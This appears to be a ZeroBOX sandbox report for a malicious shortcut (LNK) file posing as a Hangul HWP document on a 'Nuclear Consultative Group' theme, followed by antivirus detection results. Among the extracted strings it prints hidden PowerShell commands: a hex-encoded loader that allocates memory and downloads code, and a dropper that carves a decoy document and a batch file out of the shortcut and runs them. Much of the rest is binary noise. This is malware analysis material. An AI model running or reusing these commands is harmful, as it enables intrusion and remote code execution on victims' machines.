popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
%windir%\SysWOW64\cmd.exe
IDATx^
c$`LuTK<
2PK=[m
R~JZ>.?-
K} _mp
g_f,$}
re_U;k
n7t{'
q^tm]VN
uV7o)O
}TOYXSE
mQ*o8W
%PkR~{,
*3l2&g
Mn2P_q
{c1nUG/
re_U3c
|Z kB,
oL."{A
fXtuTm
\BPzlo
ZBA/P_
_rCuA*l
q~>p;
W Pc:X\y
OX7U?*
?</u;Jf=}
aYy]tp
|4f#mwe
?;NG}S
@m<?;w
;)WwI]
]w}\sOi
>Gm?;>V
Xy}u}:\
F\v8w_
/zPjE(
>5yuE(
HWP Document File
j)%C$M
^E_#zJ
+q{J63
0!`"T
E#XDF3tp}3W6
E~$0iO
u;q- P
wgS.|
__]en
GZ1jyX7
DxRW2Z
!nH ha:
7tB(yn
Pq,`-Df
-gN^fX
start /min c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D22687
/k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = '%temp%'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.
.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = '%temp%\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;=C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe
%windir%\SysWOW64\cmd.exe
Root Entry
Root Entry
FileHeader
DocInfo
HwpSummaryInformation
BodyText
PrvImage
PrvText
DocOptions
Scripts
JScriptVersion
DefaultJScript
_LinkDoc
| 2023
https://firenzedt.com/27251
Nuclear Consultative Group)
Section0
Phoenix
Tuesday, May 9, 2023 11:44:36 AM
Phoenix
10, 0, 0, 5060 WIN32LEWindows_8
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
FireEye Heur.BZC.YAX.Boxter.949.9B7AE7BC
CAT-QuickHeal Clean
ALYac Heur.BZC.YAX.Boxter.949.9B7AE7BC
Malwarebytes Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
ESET-NOD32 LNK/TrojanDropper.Agent.DD
TrendMicro-HouseCall Clean
Avast Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.WinLNK.Powecod.c
BitDefender Heur.BZC.YAX.Boxter.949.9B7AE7BC
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Sophos Troj/LnkDrop-M
F-Secure Malware.LNK/Drop.Agent.VPVF
Baidu Clean
VIPRE Heur.BZC.YAX.Boxter.949.9B7AE7BC
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Heur.BZC.YAX.Boxter.949.9B7AE7BC (B)
Ikarus Clean
GData Heur.BZC.YAX.Boxter.949.9B7AE7BC
Jiangmin Clean
Avira LNK/Drop.Agent.VPVF
MAX malware (ai score=89)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.YAX.Boxter.949.9B7AE7BC
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.WinLNK.Powecod.c
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Trojan.Link.Crafted
Zoner Clean
Tencent Clean
Yandex Clean
SentinelOne Static AI - Suspicious LNK
MaxSecure Clean
Fortinet Clean
AVG Clean
Panda Clean
No IRMA results available.